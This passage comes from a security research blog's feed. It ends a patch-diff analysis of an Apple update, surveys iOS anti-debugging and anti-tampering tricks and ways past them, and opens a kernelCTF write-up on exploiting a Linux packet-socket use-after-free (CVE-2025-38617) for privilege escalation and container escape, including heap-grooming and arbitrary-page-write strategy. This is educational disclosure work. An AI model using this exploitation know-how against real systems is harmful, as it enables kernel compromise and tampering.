server&#8217;s registration map holds a strong reference to each <code>SWServerRegistration</code>, so the registration can&#8217;t be deallocated while something still points at it. The <code>cancelJobsFromServiceWorker</code> removal suggests the job cancellation logic moved elsewhere.
This is the kind of change you make when weak references can dangle in a concurrent context.</p><p>Unlike the Navigation API fix, this change hasn&#8217;t landed on <a href="https://github.com/WebKit/WebKit/blob/main/Source/WebCore/workers/service/server/SWServerRegistration.h">public WebKit main</a>; as of this writing, <code>SWServerRegistration</code> still inherits from <code>RefCountedAndCanMakeWeakPtr</code>, <code>m_scopeToRegistrationMap</code> still uses <code>WeakRef</code>, and <code>cancelJobsFromServiceWorker</code> still exists. This is an Apple-internal patch, visible only in the BSI binary. The evidence here comes entirely from symbol-level diffing and decompilation, not source.</p><h4>Non-security changes</h4><p><code>ProductKit</code> and <code>ProductKitCore</code> both went <em>down</em> in version (<code>129.400.11.2.4</code> -&gt; <code>129.400.11.2.2</code>), removed device model strings for unannounced hardware (Mac17,6-Mac17,9; iPad16,8-iPad16,11), and got slightly smaller. These were likely pulled into the BSI as dependencies of the WebKit rebuild.</p><p><code>SettingsFoundation</code> removed the <code>_SFDeviceSupportsRFExposure2026OrLater</code> function and the associated &#8220;<code>RF_INTRO_IPHONE_2026</code>&#8221; string, suggesting an RF exposure regulatory check was removed or consolidated elsewhere.</p><p><code>WebGPU</code> gained one new symbol (<code>Vector&lt;pair&lt;AST::Function*, String&gt;&gt;::expandCapacity</code>). This is a template instantiation pulled in by the WebKit rebuild, not a functional change.</p><h4>File changes</h4><p>Only <code>.fseventsd</code> journal entries rotated. No actual filesystem content was added or removed.</p><h3>Conclusion</h3><p>Apple&#8217;s first BSI shipped one fix for CVE-2026-20643 and two they didn&#8217;t mention. The CVE fix was a six-line change to a URL component comparison that the spec already required. It is the kind of bug where you read the spec, read the code, and wonder how it shipped without the check.
The ANGLE integer overflow and ServiceWorker lifetime hardening are arguably more interesting: one is a WebGL-reachable memory safety issue, the other plugs a dangling-reference hole in a concurrent subsystem. Neither made the advisory.</p><p>The BSI delivery itself worked as advertised. 26.5 MiB, two cryptex DMGs, no user interaction. If you want to do this kind of teardown yourself: <code>ipsw ota patch rsr</code> gets you mountable DMGs, <code>ipsw diff</code> gives you the symbol-level triage, and IDA on the extracted DSC modules gets you pseudocode to confirm what actually changed. The full diff is <a href="https://github.com/blacktop/ipsw-diffs/blob/main/23D8133__iPhone17,1__vs_23D771330a__iPhone17,1/README.md">on GitHub</a>.</p><p><em>&#8212;blacktop</em></p>]]></content:encoded></item><item><title><![CDATA[Taking Apart iOS Apps: Anti-Debugging and Anti-Tampering in the Wild]]></title><description><![CDATA[Table Of Contents]]></description><link>https://blog.calif.io/p/taking-apart-ios-apps-anti-debugging</link><guid isPermaLink="false">https://blog.calif.io/p/taking-apart-ios-apps-anti-debugging</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Tue, 17 Mar 2026 18:22:08 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ICQe!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Table Of Contents</strong></p><ol><li><p><a href="https://blog.calif.io/i/191281303/1-the-app-that-exploited-ios-side-channels">The App That Exploited iOS Side Channels</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/2-the-app-that-checked-itself">The App That Checked Itself</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/3-the-app-that-killed-itself-on-attach">The App That Killed Itself on Attach</a></p></li><li><p><a 
href="https://blog.calif.io/i/191281303/4-the-app-that-ruined-its-own-crash-logs">The App That Ruined Its Own Crash Logs</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/5-the-app-that-let-ios-do-the-killing">The App That Let iOS Do the Killing</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/6-the-app-that-kept-checking">The App That Kept Checking</a></p></li><li><p><a href="https://blog.calif.io/i/191281303/conclusion">Conclusion</a></p></li></ol><p>This journey started from a mix of curiosity and convenience. Some of us wanted to push a game a bit further and show off a better score. At the same time, as part of red team work, we were interested in how banking apps handled money behind the scenes. The goal was simple: attach a debugger, observe behavior, and figure out how things worked.</p><p>That did not always go as expected.</p><p>Some apps would exit immediately. Others ran for a while, then failed later without any clear reason. In a few cases, there was no usable crash at all. Each app behaved differently, but after going through enough of them, the same patterns kept showing up.</p><p>Developers of these apps are not relying on a single check anymore. They combine multiple techniques to make inspection harder and modification unreliable, even on non-jailbroken devices. The techniques themselves are not new. What stands out is how they are layered together and how early they are applied. Over time, it becomes less about a single protection and more about how they interact.</p><p>This article walks through a set of these techniques and how they show up in practice on iOS apps.</p><h2>1. The App That Exploited iOS Side Channels</h2><p>One app we looked at would fail before any meaningful logic executed. With no debugger attached and no modifications in place, the app still exits immediately on launch.</p><p>It turned out the app was performing early environment checks by relying on side-channel signals rather than explicit APIs. 
It called into a private system API and used the return behavior to infer whether certain apps were installed on the device. If anything suspicious showed up, it stopped there.</p><p>A notable case involved a banking application that used the private API <code>SBSLaunchApplicationWithIdentifierAndURLAndLaunchOptions</code>. It did not use the API for its intended purpose. Instead, it inspected the return logs as a side channel. By doing this, it could detect the presence of applications commonly associated with modified environments, based on bundle identifiers such as <code>com.opa334.TrollStore</code>, <code>org.coolstar.SileoStore</code>, <code>com.tigisoftware.Filza</code>, and others. If any of these were detected, the app assumed the device was not trustworthy and refused to proceed.</p><p>This specific behavior was later addressed by Apple in iOS 18.5 (CVE-2025-31207), but the pattern is still relevant.</p><p><strong>Technique: Pre-execution environment checks</strong></p><ul><li><p>Query system APIs, including undocumented ones, for indirect signals</p></li><li><p>Use side-channel behavior such as API return logs to detect installed applications</p></li><li><p>Detect presence of known tools via bundle identifiers</p></li></ul><h2>2. The App That Checked Itself</h2><p>Some apps go further and verify their own state before doing anything useful.</p><p>A common approach, especially in games, is to query code signing state using <code>csops()</code>. In particular, checking <code>CS_OPS_ENTITLEMENTS_BLOB</code> allows the app to retrieve its own entitlements. Unexpected entitlements can indicate a modified or non-standard environment. This gives the app another signal to decide whether it is running on a jailbroken device.</p><p>Some apps also verify their own integrity before continuing. This includes computing hashes such as <code>CRC32</code> or <code>MD5</code> across application data and checking the signing certificate of the installed IPA. 
Structures like <code>LC_ENCRYPTION_INFO_64</code> are used to detect whether the app has been re-signed or altered.</p><p><strong>Technique: Integrity and code-signing checks</strong></p><ul><li><p>Use <code>csops()</code> with <code>CS_OPS_ENTITLEMENTS_BLOB</code> to inspect entitlements and infer jailbreak state</p></li><li><p>Perform file integrity checks using <code>CRC32</code> and <code>MD5</code></p></li><li><p>Validate signing certificates and detect re-signing via <code>LC_ENCRYPTION_INFO_64</code></p></li></ul><h2>3. The App That Killed Itself on Attach</h2><p>Another pattern shows up once you try to attach a debugger: the app exits immediately.</p><p>In most cases, this comes down to <code>ptrace()</code> with <code>PT_DENY_ATTACH</code>. When that flag is set, any attempt to attach a debugger causes the process to terminate, usually through <code>abort()</code> or <code>exit()</code>.</p><p>The usual way around this is to deal with the termination path rather than the detection. If the app cannot terminate itself, it continues running. Patching the execution flow to bypass calls to <code>abort()</code> and <code>exit()</code> is often enough to keep the process alive and allow runtime inspection.</p><p>When <code>PT_DENY_ATTACH</code> is used directly, there are also existing workarounds that modify or disable its behavior so a debugger can attach. These approaches have been documented in detail, including a write-up by <a href="https://bryce.co/undebuggable/">Bryce Bostwick</a> that walks through the process of dealing with <code>ptrace()</code> on iOS.</p><p><strong>Technique: Runtime anti-debugging with </strong><code>ptrace()</code></p><ul><li><p>Call <code>ptrace(PT_DENY_ATTACH)</code> to block debugger attachment</p></li><li><p>Trigger process termination when debugging is detected</p></li></ul><h2>4. The App That Ruined Its Own Crash Logs</h2><p>Some apps do not just exit.
They also make sure you cannot learn anything from the crash.</p><p>We ran into one that behaved normally until you tried to debug it. Then the crash logs stopped being useful. Registers were filled with the same, impossible value, and the backtrace did not point to anything meaningful.</p><p>Looking closer, the app was writing garbage into the CPU registers before crashing. In one case, every register was set to a constant like <code>0x123456789a00</code>. The crash still happened, but the state was no longer trustworthy, so there was nothing useful to extract from it.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ICQe!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ICQe!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 424w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 848w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 1456w" sizes="100vw"><img 
src="https://substackcdn.com/image/fetch/$s_!ICQe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg" width="1442" height="488" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:488,&quot;width&quot;:1442,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:151988,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/191281303?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ICQe!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 424w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 848w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!ICQe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5b29dd2-0b00-49e5-b2af-4660a306e76d_1442x488.jpeg 1456w" 
sizes="100vw" loading="lazy"></picture></div></a><figcaption class="image-caption"><em>This iOS app, running on macOS, corrupted the registers before crashing</em>.</figcaption></figure></div><p>This makes it difficult to trace where the detection actually occurred. Even if you hit the right code path, the information you get back is already corrupted.</p><p>It does not prevent debugging entirely, but it slows things down.
You have to find the check before the crash instead of relying on the crash itself.</p><p><strong>Technique: Register corruption for analysis resistance</strong></p><ul><li><p>Overwrite register state before crashing</p></li><li><p>Produce garbage register values in crash logs</p></li><li><p>Obscure the origin of detection logic and break backtraces</p></li></ul><h2>5. The App That Let iOS Do the Killing</h2><p>One game app produced probably the weirdest &#8220;crash&#8221; we have dealt with. The app would run, and as soon as we tried to debug it, it would get terminated without leaving any crash logs.</p><p>The reason was memory pressure. Instead of crashing directly through abort() or access violations, the app pushed memory usage high enough to trigger a jetsam condition. On iOS, jetsam is a kernel mechanism that kills processes when the system is under memory pressure or when an app exceeds its memory limits.</p><p>Because the system performs the termination, there is no normal crash log. You only get a jetsam record, and the anti-debug detection logic does not show up in any backtrace.</p><p>In this case, this behavior was combined with other checks such as jailbreak detection and tracing, which removes the usual approach of following a crash to locate the check.</p><p><strong>Technique: Resource exhaustion to trigger jetsam</strong></p><ul><li><p>Allocate excessive memory to force OS-level termination</p></li><li><p>Avoid generating application crash logs</p></li><li><p>Leave only system-level jetsam records</p></li></ul><h2>6. The App That Kept Checking</h2><p>Some apps pass the initial checks but still fail later.</p><p>In these cases, detection continues in the background and is enforced with delay. When a check fails, the app may record the state and only terminate after a timer elapses. That delay makes it harder to link the crash to the original trigger.</p><p>There is often a periodic task acting as a heartbeat. 
It wakes up at fixed intervals and re-runs parts of the detection logic, so passing checks once does not mean you are in the clear.</p><p>This setup makes behavior less predictable. Failures can happen later, without a clear signal of what caused them.</p><p><strong>Technique: Continuous detection with delayed enforcement</strong></p><ul><li><p>Record tamper state and trigger crashes after a delay</p></li><li><p>Use timers to decouple detection from enforcement</p></li><li><p>Run periodic heartbeat tasks to re-check state</p></li><li><p>Re-trigger enforcement even after initial checks pass</p></li></ul><h2>Conclusion</h2><p>Taken together, these examples show how things have changed. What used to be a single check or a simple <code>ptrace()</code> call is now a combination of techniques. Environment checks happen early, debugger detection is enforced at runtime, crash logs are made useless, and in some cases removed entirely through jetsam. On top of that, integrity checks and timed enforcement add another layer that keeps running after launch.</p><p>None of these techniques are especially complex on their own. The difficulty comes from how they are combined. You are not dealing with one mechanism, but a system where each part covers gaps left by the others.</p><p>For readers who are familiar with protection systems on Windows (anti-cheat, anti-debug, anti-tampering, etc.), you may wonder why they don&#8217;t use more aggressive techniques such as kernel level drivers and code injection. 
The answer is that iOS has a different security model and it does not allow kernel extensions or unsigned code execution.</p>]]></content:encoded></item><item><title><![CDATA[A Race Within A Race: Exploiting CVE-2025-38617 in Linux Packet Sockets]]></title><description><![CDATA[A step-by-step guide to exploiting a 20-year-old bug in the Linux kernel to achieve full privilege escalation and container escape, plus a cool bug-hunting heuristic.]]></description><link>https://blog.calif.io/p/a-race-within-a-race-exploiting-cve</link><guid isPermaLink="false">https://blog.calif.io/p/a-race-within-a-race-exploiting-cve</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Tue, 03 Mar 2026 18:32:13 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!CIRL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Table of Contents</h2><ul><li><p><a href="https://blog.calif.io/i/189789999/introduction">Introduction</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/background">Background</a></p><ul><li><p><a href="https://blog.calif.io/i/189789999/packet-sockets">Packet Sockets</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/ring-buffers-and-tpacketv3">Ring Buffers and TPACKET_V3</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/extended-attributes-and-simplexattr">Extended Attributes and simple_xattr</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/slab-allocator-vs-page-allocator">Slab Allocator vs Page Allocator</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/kernel-heap-mitigations">Kernel Heap Mitigations</a></p></li></ul></li><li><p><a href="https://blog.calif.io/i/189789999/the-vulnerability">The Vulnerability</a></p><ul><li><p><a href="https://blog.calif.io/i/189789999/the-conditional-zeroing-bug">The Conditional Zeroing 
Bug</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/the-race-window-and-uaf">The Race Window and UAF</a></p></li></ul></li><li><p><a href="https://blog.calif.io/i/189789999/the-key-insight-sleeping-mutex-holders-stretch-race-windows">The Key Insight: Sleeping Mutex Holders Stretch Race Windows</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/the-exploit">The Exploit</a></p><ul><li><p><a href="https://blog.calif.io/i/189789999/stage-0-winning-the-races">Stage 0: Winning the Races</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-1-page-overflow-primitive-via-xattr-corruption">Stage 1: Page Overflow Primitive (via xattr corruption)</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-2-heap-readwrite-via-pgv-overlap">Stage 2: Heap Read/Write via pgv Overlap</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-3-arbitrary-page-readwrite-via-pgv-overlap">Stage 3: Arbitrary Page Read/Write via pgv Overlap</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-4-kaslr-bypass-via-pipe-buffer">Stage 4: KASLR Bypass via Pipe Buffer</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/stage-5-privilege-escalation-via-syscall-patching">Stage 5: Privilege Escalation via Syscall Patching</a></p></li></ul></li><li><p><a href="https://blog.calif.io/i/189789999/the-fix">The Fix</a></p></li><li><p><a href="https://blog.calif.io/i/189789999/takeaways">Takeaways</a></p></li></ul><h2>Introduction</h2><p>CVE-2025-38617 is a use-after-free vulnerability in the Linux kernel&#8217;s packet socket subsystem, caused by a race condition between packet_set_ring() and packet_notifier(). The bug has existed since Linux 2.6.12 (2005) and was fixed in kernel version 6.16. 
It allows an unprivileged local attacker &#8212; needing only CAP_NET_RAW, obtainable through user namespaces &#8212; to achieve full privilege escalation and container escape.</p><p>The vulnerability and exploits were discovered and developed by Quang Le, a member of <a href="https://calif.io">Calif</a>, and submitted as part of Google&#8217;s <a href="https://google.github.io/security-research/kernelctf/rules.html">kernelCTF</a> program. Calif provides this complimentary write-up to offer additional background for educational purposes.</p><p>This article analyzes the vulnerability, the <a href="https://github.com/google/security-research/pull/339">exploit submission</a>, and the two-line fix. The exploit is notable for its sophistication: it defeats modern kernel mitigations including CONFIG_RANDOM_KMALLOC_CACHES and CONFIG_SLAB_VIRTUAL, builds exploit primitives through a chain of four increasingly powerful stages, and uses creative timing techniques to win two separate race conditions deterministically.</p><p>But perhaps the most interesting aspect is the <em>bug-finding heuristic</em> it demonstrates: <strong>when a mutex holder sleeps, the time window between lock release and the next critical operation becomes predictable and stretchable, turning otherwise unexploitable code sequences into reliable race conditions.</strong></p><ul><li><p><strong>Affected versions</strong>: Linux 2.6.12 through 6.15</p></li><li><p><strong>Affected component</strong>: net/packet/af_packet.c (packet socket subsystem)</p></li><li><p><strong>Root cause</strong>: Race condition leading to use-after-free</p></li><li><p><strong>Required capability</strong>: CAP_NET_RAW (available via unprivileged user namespaces)</p></li><li><p><strong>Fix commit</strong>: <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=01d3c8417b9c1b884a8a981a3b886da556512f36">01d3c8417b9c</a></p></li></ul><h2>Background</h2><h3>Packet Sockets</h3><p>Linux packet sockets 
(AF_PACKET) provide raw access to network interfaces at the link layer. They&#8217;re used by tools like tcpdump and wireshark to capture network traffic. When a packet arrives on a network interface, the kernel delivers a copy to any packet socket &#8220;hooked&#8221; to that interface through a registered protocol hook function.</p><p>Packet sockets have a lifecycle tied to network interface state:</p><ul><li><p>When the interface goes <strong>UP</strong>, the packet socket&#8217;s protocol hook is registered, and the socket enters the PACKET_SOCK_RUNNING state. It can now receive packets.</p></li><li><p>When the interface goes <strong>DOWN</strong>, the hook is unregistered, and the socket stops receiving packets.</p></li></ul><p>These transitions are managed by packet_notifier(), which handles NETDEV_UP and NETDEV_DOWN events.</p><h3>Ring Buffers and TPACKET_V3</h3><p>For high-performance packet processing, packet sockets support memory-mapped ring buffers. Instead of copying each packet through recvmsg(), the kernel writes packets directly into a shared memory region that userspace can mmap(). The ring buffer is configured through setsockopt() with PACKET_RX_RING (for receiving) or PACKET_TX_RING (for transmitting), which internally calls packet_set_ring().</p><p>The ring buffer consists of multiple &#8220;blocks,&#8221; each a contiguous allocation of kernel pages. These blocks are tracked by an array of struct pgv pointers:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;0e9fca7c-2ceb-4aca-b05c-f67f1e1ce280&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct pgv {
    char *buffer;  // pointer to one block of pages
};</code></pre></div><p>The alloc_pg_vec() function allocates this array and each block:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;5dd519b5-340f-481f-a3c4-98d829d2522f&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
    unsigned int block_nr = req-&gt;tp_block_nr;
    struct pgv *pg_vec;
    int i;
    pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
    for (i = 0; i &lt; block_nr; i++) {
        pg_vec[i].buffer = alloc_one_pg_vec_page(order);
    }
    return pg_vec;
}</code></pre></div><p><strong>How userspace accesses ring buffer blocks: mmap().</strong> When userspace calls mmap() on a packet socket file descriptor, the kernel&#8217;s packet_mmap() handler walks the pgv array and maps each block&#8217;s pages into the calling process&#8217;s virtual address space as a single contiguous region. Block 0&#8217;s pages appear first, followed by block 1&#8217;s pages, and so on. The result is that userspace gets a pointer to a memory region where offset 0 is the start of block 0, offset block_size is the start of block 1, etc. Reads/writes to this region go directly to the kernel pages backing the ring buffer, with no syscall overhead.</p><p>This mapping is based on what pgv[N].buffer points to <strong>at mmap time</strong>. The kernel resolves each pgv entry to its underlying physical page and maps that page into userspace. This has a critical implication for the exploit: if an attacker can overwrite a pgv[N].buffer pointer to an arbitrary kernel address and then call mmap(), the kernel will map whatever page lives at that address into userspace &#8212; giving the attacker direct read/write access to arbitrary kernel memory. This is exactly how Stages 2 and 3 escalate from a single corrupted pointer to full arbitrary page read/write.</p><p>TPACKET_V3, the most recent version of the packet socket ring buffer protocol, adds a block descriptor structure (tpacket_kbdq_core) that tracks which block is currently active, where the next packet header should be written, and when to retire (close) a full block and move to the next. 
Key fields include:</p><ul><li><p>pkbdq: pointer to the pgv array (the ring buffer itself)</p></li><li><p>kactive_blk_num: index of the currently active block</p></li><li><p>nxt_offset: pointer to where the next packet will be written within the current block</p></li><li><p>kblk_size: size of each block</p></li><li><p>knum_blocks: total number of blocks</p></li><li><p>blk_sizeof_priv: size of the per-block private area</p></li></ul><p>Each block&#8217;s memory layout starts with a tpacket_block_desc header (48 bytes after alignment), followed by a <strong>private area</strong> of blk_sizeof_priv bytes, and then the actual packet data region. The private area is configured by userspace via the tp_sizeof_priv field of the tpacket_req3 structure passed to setsockopt(PACKET_RX_RING). The kernel reserves this space at the start of each block and never writes packet data into it &#8212; it exists so that userspace applications can store their own per-block metadata (e.g., custom timestamps or statistics). The packet write cursor (nxt_offset) is initialized to block_start + 48 + ALIGN(blk_sizeof_priv, 8), skipping past both the header and the private area. As we&#8217;ll see, the exploit sets tp_sizeof_priv = 16248 to position the write cursor precisely where it needs to overflow into an adjacent object.</p><p>When a packet arrives, tpacket_rcv() is called, which looks up the current block via pkbdq[kactive_blk_num].buffer, finds the write position (nxt_offset), copies the packet data, and writes metadata headers. This is the function that will access freed memory in our vulnerability.</p><h3>Extended Attributes and simple_xattr</h3><p>Extended attributes (xattrs) are name-value pairs that can be attached to files and directories, providing metadata beyond the standard file attributes (permissions, timestamps, etc.). 
They&#8217;re organized into namespaces &#8212; security.* for SELinux labels and capabilities, user.* for arbitrary user data, trusted.* for privileged metadata, and so on. Userspace interacts with them through three syscalls: setxattr() to create or update, getxattr() to read, and removexattr() to delete.</p><p>Most filesystems store xattrs on disk, but in-memory filesystems like <strong>tmpfs</strong> have no disk backing. Instead, tmpfs stores xattrs entirely in kernel memory using the simple_xattr infrastructure. Each xattr is represented by a struct simple_xattr. On Linux 6.6 (which the exploit targets), xattrs are organized in a <strong>red-black tree</strong>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;75ef4686-3fc6-4209-a7c3-daaafbd80a83&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct rb_node {
    unsigned long  __rb_parent_color;  // parent pointer + color bit
    struct rb_node *rb_right;
    struct rb_node *rb_left;
};  // 24 bytes

struct simple_xattr {
    struct rb_node rb_node;  // offset 0,  size 24 (tree node pointers)
    char *name;              // offset 24, size 8
    size_t size;             // offset 32, size 8  &#8592; overflow target
    char value[];            // offset 40          (inline value)
};  // total header: 40 bytes</code></pre></div><p>The rb_node at the start of the struct contains three pointers: __rb_parent_color (the parent pointer with the color bit encoded in the lowest bit), rb_right, and rb_left. These point to other simple_xattr nodes in the same red-black tree.</p><p>When userspace calls setxattr(&#8220;security.foo&#8221;, value, size) on a tmpfs file, the kernel allocates a simple_xattr, copies the name and value, and inserts it into the inode&#8217;s collection. When getxattr() is called, the kernel traverses the collection comparing names, and when it finds a match, copies size bytes from value[] to the userspace buffer. If the userspace buffer is smaller than size, the kernel returns ERANGE &#8212; a behavior the exploit uses to detect corruption.</p><p>The simple_xattr is an ideal exploitation target for several reasons:</p><ol><li><p><strong>Controlled allocation size.</strong> The kmalloc(header + value_size) allocation can be steered to any slab cache or page order by choosing the right value_size. With value_size = 8192, the total allocation (40 + 8,192 = 8,232 bytes) is served from order-2 pages (16 KB).</p></li></ol><ol start="2"><li><p><strong>Controlled content.</strong> The value[] data is fully attacker-controlled, and the name string is chosen by the attacker.</p></li></ol><ol start="3"><li><p><strong>Readable and writable via syscalls.</strong> getxattr() reads size bytes starting from value[] &#8212; if size is corrupted to a larger value, the kernel reads past the object&#8217;s actual data, leaking adjacent heap memory. setxattr() can update the value. removexattr() frees the object.</p></li></ol><ol start="4"><li><p><strong>Address leaking via node pointers.</strong> The rb_node pointers contain kernel addresses of neighboring nodes in the tree.
If an attacker can read these pointers, they learn the kernel addresses of other simple_xattr objects &#8212; the starting point for building further primitives.</p></li></ol><ol start="5"><li><p><strong>Sprayable.</strong> Creating thousands of xattrs on a single tmpfs file is trivial &#8212; just call setxattr() in a loop with unique names (&#8220;security.groom_0&#8221;, &#8220;security.groom_1&#8221;, ...). The exploit sprays 2,048 of them to fill the heap predictably.</p></li></ol><h3>Slab Allocator vs Page Allocator</h3><p>The Linux kernel has two layers of memory allocation, and understanding the boundary between them is essential to this exploit.</p><p>The <strong>page allocator</strong> (also called the buddy allocator) is the bottom layer. It manages physical memory in power-of-2 page chunks: order-0 (4 KB), order-1 (8 KB), order-2 (16 KB), and so on. Every allocation is page-aligned. When pages are freed, adjacent free pages of the same order merge (&#8220;buddy&#8221;) into higher-order blocks. Crucially, the page allocator has <strong>no segregation by type</strong> &#8212; all order-2 pages come from the same freelist. A freed order-2 page from a simple_xattr value can be reclaimed by an order-2 pgv array allocation; the page allocator doesn&#8217;t know or care what the pages are used for.</p><p>The <strong>slab allocator</strong> (SLUB on modern kernels) sits on top of the page allocator. It requests pages from the buddy allocator and carves them into fixed-size slots for small objects. It has generic size classes (kmalloc-8, kmalloc-16, ... kmalloc-8k) and dedicated caches for specific struct types. Unlike the page allocator, slab caches are <strong>segregated</strong> &#8212; a freed kmalloc-192 slot returns to its specific cache, and can only be reclaimed by another kmalloc-192 allocation.</p><p>This boundary is the reason the exploit forces certain allocations to exceed kmalloc-8k (the largest generic slab bucket).
An 8,200-byte pgv array can&#8217;t fit in kmalloc-8k, so the allocator falls through to the page allocator, where the exploit&#8217;s heap grooming controls which freed pages get reclaimed. If the allocation stayed within the slab, freed xattr pages and pgv arrays would live in completely different caches with no way to reclaim each other.</p><h3>Kernel Heap Mitigations</h3><p>The kernelCTF mitigation-v4-6.6 environment enables two modern heap mitigations that make traditional cross-cache attacks significantly harder.</p><p><strong>CONFIG_RANDOM_KMALLOC_CACHES</strong> introduces 16 separate slab caches for each kmalloc size class (e.g., kmalloc-rnd-01-32, kmalloc-rnd-02-32, ... kmalloc-rnd-16-32). When the kernel calls kmalloc(), the allocation is routed to one of these 16 caches based on a hash of the <strong>call site address</strong> combined with a per-boot random seed. The goal is to prevent an attacker from predicting which cache an allocation lands in, breaking the classic exploit pattern of freeing object A from cache X and reclaiming it with object B from the same cache X. Since A and B come from different call sites, they&#8217;ll likely land in different random caches and the reclamation fails.</p><p>The bypass: if two allocations come from the <strong>same call site</strong> (the same line of source code that calls kmalloc/kcalloc), they always hash to the same random cache, regardless of the boot seed. The exploit leverages this by using alloc_pg_vec() &#8212; the same function, the same kcalloc() call site &#8212; for both the victim ring buffer and the reclamation ring buffer. Both are pgv 